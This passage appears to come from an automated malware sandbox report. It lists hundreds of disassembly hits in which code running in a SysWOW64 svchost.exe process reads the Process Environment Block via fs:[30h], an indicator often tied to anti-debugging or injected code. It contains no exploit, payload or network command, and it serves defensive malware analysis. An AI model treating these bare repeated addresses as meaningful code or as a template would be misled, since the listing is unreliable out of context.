                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CE0274 mov eax, dword ptr fs:[00000030h] 2_2_03CE0274
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CE0274 mov eax, dword ptr fs:[00000030h] 2_2_03CE0274
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CE0274 mov eax, dword ptr fs:[00000030h] 2_2_03CE0274
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CE0274 mov eax, dword ptr fs:[00000030h] 2_2_03CE0274
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CE0274 mov eax, dword ptr fs:[00000030h] 2_2_03CE0274
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CE0274 mov eax, dword ptr fs:[00000030h] 2_2_03CE0274
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CE0274 mov eax, dword ptr fs:[00000030h] 2_2_03CE0274
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CE0274 mov eax, dword ptr fs:[00000030h] 2_2_03CE0274
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CE0274 mov eax, dword ptr fs:[00000030h] 2_2_03CE0274
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CE0274 mov eax, dword ptr fs:[00000030h] 2_2_03CE0274
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C2823B mov eax, dword ptr fs:[00000030h] 2_2_03C2823B
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CF61C3 mov eax, dword ptr fs:[00000030h] 2_2_03CF61C3
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CF61C3 mov eax, dword ptr fs:[00000030h] 2_2_03CF61C3
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CAE1D0 mov eax, dword ptr fs:[00000030h] 2_2_03CAE1D0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CAE1D0 mov eax, dword ptr fs:[00000030h] 2_2_03CAE1D0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CAE1D0 mov ecx, dword ptr fs:[00000030h] 2_2_03CAE1D0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CAE1D0 mov eax, dword ptr fs:[00000030h] 2_2_03CAE1D0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CAE1D0 mov eax, dword ptr fs:[00000030h] 2_2_03CAE1D0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03D061E5 mov eax, dword ptr fs:[00000030h] 2_2_03D061E5
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C601F8 mov eax, dword ptr fs:[00000030h] 2_2_03C601F8
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C70185 mov eax, dword ptr fs:[00000030h] 2_2_03C70185
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CEC188 mov eax, dword ptr fs:[00000030h] 2_2_03CEC188
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CEC188 mov eax, dword ptr fs:[00000030h] 2_2_03CEC188
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CD4180 mov eax, dword ptr fs:[00000030h] 2_2_03CD4180
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CD4180 mov eax, dword ptr fs:[00000030h] 2_2_03CD4180
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CB019F mov eax, dword ptr fs:[00000030h] 2_2_03CB019F
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CB019F mov eax, dword ptr fs:[00000030h] 2_2_03CB019F
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CB019F mov eax, dword ptr fs:[00000030h] 2_2_03CB019F
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CB019F mov eax, dword ptr fs:[00000030h] 2_2_03CB019F
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C2A197 mov eax, dword ptr fs:[00000030h] 2_2_03C2A197
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C2A197 mov eax, dword ptr fs:[00000030h] 2_2_03C2A197
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C2A197 mov eax, dword ptr fs:[00000030h] 2_2_03C2A197
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CC4144 mov eax, dword ptr fs:[00000030h] 2_2_03CC4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CC4144 mov eax, dword ptr fs:[00000030h]2_2_03CC4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CC4144 mov ecx, dword ptr fs:[00000030h]2_2_03CC4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CC4144 mov eax, dword ptr fs:[00000030h]2_2_03CC4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CC4144 mov eax, dword ptr fs:[00000030h]2_2_03CC4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2C156 mov eax, dword ptr fs:[00000030h]2_2_03C2C156
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CC8158 mov eax, dword ptr fs:[00000030h]2_2_03CC8158
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C36154 mov eax, dword ptr fs:[00000030h]2_2_03C36154
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C36154 mov eax, dword ptr fs:[00000030h]2_2_03C36154
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D04164 mov eax, dword ptr fs:[00000030h]2_2_03D04164
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D04164 mov eax, dword ptr fs:[00000030h]2_2_03D04164
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CDE10E mov eax, dword ptr fs:[00000030h]2_2_03CDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CDE10E mov ecx, dword ptr fs:[00000030h]2_2_03CDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CDE10E mov eax, dword ptr fs:[00000030h]2_2_03CDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CDE10E mov eax, dword ptr fs:[00000030h]2_2_03CDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CDE10E mov ecx, dword ptr fs:[00000030h]2_2_03CDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CDE10E mov eax, dword ptr fs:[00000030h]2_2_03CDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CDE10E mov eax, dword ptr fs:[00000030h]2_2_03CDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CDE10E mov ecx, dword ptr fs:[00000030h]2_2_03CDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CDE10E mov eax, dword ptr fs:[00000030h]2_2_03CDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CDE10E mov ecx, dword ptr fs:[00000030h]2_2_03CDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CDA118 mov ecx, dword ptr fs:[00000030h]2_2_03CDA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CDA118 mov eax, dword ptr fs:[00000030h]2_2_03CDA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CDA118 mov eax, dword ptr fs:[00000030h]2_2_03CDA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CDA118 mov eax, dword ptr fs:[00000030h]2_2_03CDA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CF0115 mov eax, dword ptr fs:[00000030h]2_2_03CF0115
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C60124 mov eax, dword ptr fs:[00000030h]2_2_03C60124
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB20DE mov eax, dword ptr fs:[00000030h]2_2_03CB20DE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2A0E3 mov ecx, dword ptr fs:[00000030h]2_2_03C2A0E3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C380E9 mov eax, dword ptr fs:[00000030h]2_2_03C380E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB60E0 mov eax, dword ptr fs:[00000030h]2_2_03CB60E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2C0F0 mov eax, dword ptr fs:[00000030h]2_2_03C2C0F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C720F0 mov ecx, dword ptr fs:[00000030h]2_2_03C720F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C3208A mov eax, dword ptr fs:[00000030h]2_2_03C3208A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C280A0 mov eax, dword ptr fs:[00000030h]2_2_03C280A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CC80A8 mov eax, dword ptr fs:[00000030h]2_2_03CC80A8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CF60B8 mov eax, dword ptr fs:[00000030h]2_2_03CF60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CF60B8 mov ecx, dword ptr fs:[00000030h]2_2_03CF60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C32050 mov eax, dword ptr fs:[00000030h]2_2_03C32050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB6050 mov eax, dword ptr fs:[00000030h]2_2_03CB6050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5C073 mov eax, dword ptr fs:[00000030h]2_2_03C5C073
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB4000 mov ecx, dword ptr fs:[00000030h]2_2_03CB4000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CD2000 mov eax, dword ptr fs:[00000030h]2_2_03CD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CD2000 mov eax, dword ptr fs:[00000030h]2_2_03CD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CD2000 mov eax, dword ptr fs:[00000030h]2_2_03CD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CD2000 mov eax, dword ptr fs:[00000030h]2_2_03CD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CD2000 mov eax, dword ptr fs:[00000030h]2_2_03CD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CD2000 mov eax, dword ptr fs:[00000030h]2_2_03CD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CD2000 mov eax, dword ptr fs:[00000030h]2_2_03CD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CD2000 mov eax, dword ptr fs:[00000030h]2_2_03CD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C4E016 mov eax, dword ptr fs:[00000030h]2_2_03C4E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C4E016 mov eax, dword ptr fs:[00000030h]2_2_03C4E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C4E016 mov eax, dword ptr fs:[00000030h]2_2_03C4E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C4E016 mov eax, dword ptr fs:[00000030h]2_2_03C4E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2A020 mov eax, dword ptr fs:[00000030h]2_2_03C2A020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2C020 mov eax, dword ptr fs:[00000030h]2_2_03C2C020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CC6030 mov eax, dword ptr fs:[00000030h]2_2_03CC6030
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C3C7C0 mov eax, dword ptr fs:[00000030h]2_2_03C3C7C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB07C3 mov eax, dword ptr fs:[00000030h]2_2_03CB07C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C527ED mov eax, dword ptr fs:[00000030h]2_2_03C527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C527ED mov eax, dword ptr fs:[00000030h]2_2_03C527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C527ED mov eax, dword ptr fs:[00000030h]2_2_03C527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CBE7E1 mov eax, dword ptr fs:[00000030h]2_2_03CBE7E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C347FB mov eax, dword ptr fs:[00000030h]2_2_03C347FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C347FB mov eax, dword ptr fs:[00000030h]2_2_03C347FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CD678E mov eax, dword ptr fs:[00000030h]2_2_03CD678E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C307AF mov eax, dword ptr fs:[00000030h]2_2_03C307AF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CE47A0 mov eax, dword ptr fs:[00000030h]2_2_03CE47A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6674D mov esi, dword ptr fs:[00000030h]2_2_03C6674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6674D mov eax, dword ptr fs:[00000030h]2_2_03C6674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6674D mov eax, dword ptr fs:[00000030h]2_2_03C6674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C30750 mov eax, dword ptr fs:[00000030h]2_2_03C30750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CBE75D mov eax, dword ptr fs:[00000030h]2_2_03CBE75D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72750 mov eax, dword ptr fs:[00000030h]2_2_03C72750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72750 mov eax, dword ptr fs:[00000030h]2_2_03C72750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB4755 mov eax, dword ptr fs:[00000030h]2_2_03CB4755
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C38770 mov eax, dword ptr fs:[00000030h]2_2_03C38770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C40770 mov eax, dword ptr fs:[00000030h]2_2_03C40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C40770 mov eax, dword ptr fs:[00000030h]2_2_03C40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C40770 mov eax, dword ptr fs:[00000030h]2_2_03C40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C40770 mov eax, dword ptr fs:[00000030h]2_2_03C40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C40770 mov eax, dword ptr fs:[00000030h]2_2_03C40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C40770 mov eax, dword ptr fs:[00000030h]2_2_03C40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C40770 mov eax, dword ptr fs:[00000030h]2_2_03C40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C40770 mov eax, dword ptr fs:[00000030h]2_2_03C40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C40770 mov eax, dword ptr fs:[00000030h]2_2_03C40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C40770 mov eax, dword ptr fs:[00000030h]2_2_03C40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C40770 mov eax, dword ptr fs:[00000030h]2_2_03C40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C40770 mov eax, dword ptr fs:[00000030h]2_2_03C40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6C700 mov eax, dword ptr fs:[00000030h]2_2_03C6C700
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C30710 mov eax, dword ptr fs:[00000030h]2_2_03C30710
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C60710 mov eax, dword ptr fs:[00000030h]2_2_03C60710
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6C720 mov eax, dword ptr fs:[00000030h]2_2_03C6C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6C720 mov eax, dword ptr fs:[00000030h]2_2_03C6C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6273C mov eax, dword ptr fs:[00000030h]2_2_03C6273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6273C mov ecx, dword ptr fs:[00000030h]2_2_03C6273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6273C mov eax, dword ptr fs:[00000030h]2_2_03C6273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CAC730 mov eax, dword ptr fs:[00000030h]2_2_03CAC730
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6A6C7 mov ebx, dword ptr fs:[00000030h]2_2_03C6A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6A6C7 mov eax, dword ptr fs:[00000030h]2_2_03C6A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CAE6F2 mov eax, dword ptr fs:[00000030h]2_2_03CAE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CAE6F2 mov eax, dword ptr fs:[00000030h]2_2_03CAE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CAE6F2 mov eax, dword ptr fs:[00000030h]2_2_03CAE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CAE6F2 mov eax, dword ptr fs:[00000030h]2_2_03CAE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB06F1 mov eax, dword ptr fs:[00000030h]2_2_03CB06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB06F1 mov eax, dword ptr fs:[00000030h]2_2_03CB06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C34690 mov eax, dword ptr fs:[00000030h]2_2_03C34690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C34690 mov eax, dword ptr fs:[00000030h]2_2_03C34690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6C6A6 mov eax, dword ptr fs:[00000030h]2_2_03C6C6A6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C666B0 mov eax, dword ptr fs:[00000030h]2_2_03C666B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C4C640 mov eax, dword ptr fs:[00000030h]2_2_03C4C640
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CF866E mov eax, dword ptr fs:[00000030h]2_2_03CF866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CF866E mov eax, dword ptr fs:[00000030h]2_2_03CF866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6A660 mov eax, dword ptr fs:[00000030h]2_2_03C6A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6A660 mov eax, dword ptr fs:[00000030h]2_2_03C6A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C62674 mov eax, dword ptr fs:[00000030h]2_2_03C62674
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CAE609 mov eax, dword ptr fs:[00000030h]2_2_03CAE609
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C4260B mov eax, dword ptr fs:[00000030h]2_2_03C4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C4260B mov eax, dword ptr fs:[00000030h]2_2_03C4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C4260B mov eax, dword ptr fs:[00000030h]2_2_03C4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C4260B mov eax, dword ptr fs:[00000030h]2_2_03C4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C4260B mov eax, dword ptr fs:[00000030h]2_2_03C4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C4260B mov eax, dword ptr fs:[00000030h]2_2_03C4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C4260B mov eax, dword ptr fs:[00000030h]2_2_03C4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72619 mov eax, dword ptr fs:[00000030h]2_2_03C72619
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C4E627 mov eax, dword ptr fs:[00000030h]2_2_03C4E627
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C66620 mov eax, dword ptr fs:[00000030h]2_2_03C66620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C68620 mov eax, dword ptr fs:[00000030h]2_2_03C68620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C3262C mov eax, dword ptr fs:[00000030h]2_2_03C3262C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6E5CF mov eax, dword ptr fs:[00000030h]2_2_03C6E5CF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6E5CF mov eax, dword ptr fs:[00000030h]2_2_03C6E5CF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C365D0 mov eax, dword ptr fs:[00000030h]2_2_03C365D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6A5D0 mov eax, dword ptr fs:[00000030h]2_2_03C6A5D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6A5D0 mov eax, dword ptr fs:[00000030h]2_2_03C6A5D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5E5E7 mov eax, dword ptr fs:[00000030h]2_2_03C5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5E5E7 mov eax, dword ptr fs:[00000030h]2_2_03C5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5E5E7 mov eax, dword ptr fs:[00000030h]2_2_03C5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5E5E7 mov eax, dword ptr fs:[00000030h]2_2_03C5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5E5E7 mov eax, dword ptr fs:[00000030h]2_2_03C5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5E5E7 mov eax, dword ptr fs:[00000030h]2_2_03C5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5E5E7 mov eax, dword ptr fs:[00000030h]2_2_03C5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5E5E7 mov eax, dword ptr fs:[00000030h]2_2_03C5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C325E0 mov eax, dword ptr fs:[00000030h]2_2_03C325E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6C5ED mov eax, dword ptr fs:[00000030h]2_2_03C6C5ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6C5ED mov eax, dword ptr fs:[00000030h]2_2_03C6C5ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C32582 mov eax, dword ptr fs:[00000030h]2_2_03C32582
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C32582 mov ecx, dword ptr fs:[00000030h]2_2_03C32582
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C64588 mov eax, dword ptr fs:[00000030h]2_2_03C64588
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6E59C mov eax, dword ptr fs:[00000030h]2_2_03C6E59C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB05A7 mov eax, dword ptr fs:[00000030h]2_2_03CB05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB05A7 mov eax, dword ptr fs:[00000030h]2_2_03CB05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB05A7 mov eax, dword ptr fs:[00000030h]2_2_03CB05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C545B1 mov eax, dword ptr fs:[00000030h]2_2_03C545B1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C545B1 mov eax, dword ptr fs:[00000030h]2_2_03C545B1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C38550 mov eax, dword ptr fs:[00000030h]2_2_03C38550
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C38550 mov eax, dword ptr fs:[00000030h]2_2_03C38550
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6656A mov eax, dword ptr fs:[00000030h]2_2_03C6656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6656A mov eax, dword ptr fs:[00000030h]2_2_03C6656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6656A mov eax, dword ptr fs:[00000030h]2_2_03C6656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CC6500 mov eax, dword ptr fs:[00000030h]2_2_03CC6500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D04500 mov eax, dword ptr fs:[00000030h]2_2_03D04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D04500 mov eax, dword ptr fs:[00000030h]2_2_03D04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D04500 mov eax, dword ptr fs:[00000030h]2_2_03D04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D04500 mov eax, dword ptr fs:[00000030h]2_2_03D04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D04500 mov eax, dword ptr fs:[00000030h]2_2_03D04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D04500 mov eax, dword ptr fs:[00000030h]2_2_03D04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D04500 mov eax, dword ptr fs:[00000030h]2_2_03D04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C40535 mov eax, dword ptr fs:[00000030h]2_2_03C40535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C40535 mov eax, dword ptr fs:[00000030h]2_2_03C40535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C40535 mov eax, dword ptr fs:[00000030h]2_2_03C40535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C40535 mov eax, dword ptr fs:[00000030h]2_2_03C40535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C40535 mov eax, dword ptr fs:[00000030h]2_2_03C40535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C40535 mov eax, dword ptr fs:[00000030h]2_2_03C40535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5E53E mov eax, dword ptr fs:[00000030h]2_2_03C5E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5E53E mov eax, dword ptr fs:[00000030h]2_2_03C5E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5E53E mov eax, dword ptr fs:[00000030h]2_2_03C5E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5E53E mov eax, dword ptr fs:[00000030h]2_2_03C5E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5E53E mov eax, dword ptr fs:[00000030h]2_2_03C5E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C304E5 mov ecx, dword ptr fs:[00000030h]2_2_03C304E5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CEA49A mov eax, dword ptr fs:[00000030h]2_2_03CEA49A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C364AB mov eax, dword ptr fs:[00000030h]2_2_03C364AB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C644B0 mov ecx, dword ptr fs:[00000030h]2_2_03C644B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CBA4B0 mov eax, dword ptr fs:[00000030h]2_2_03CBA4B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6E443 mov eax, dword ptr fs:[00000030h]2_2_03C6E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6E443 mov eax, dword ptr fs:[00000030h]2_2_03C6E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6E443 mov eax, dword ptr fs:[00000030h]2_2_03C6E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6E443 mov eax, dword ptr fs:[00000030h]2_2_03C6E443
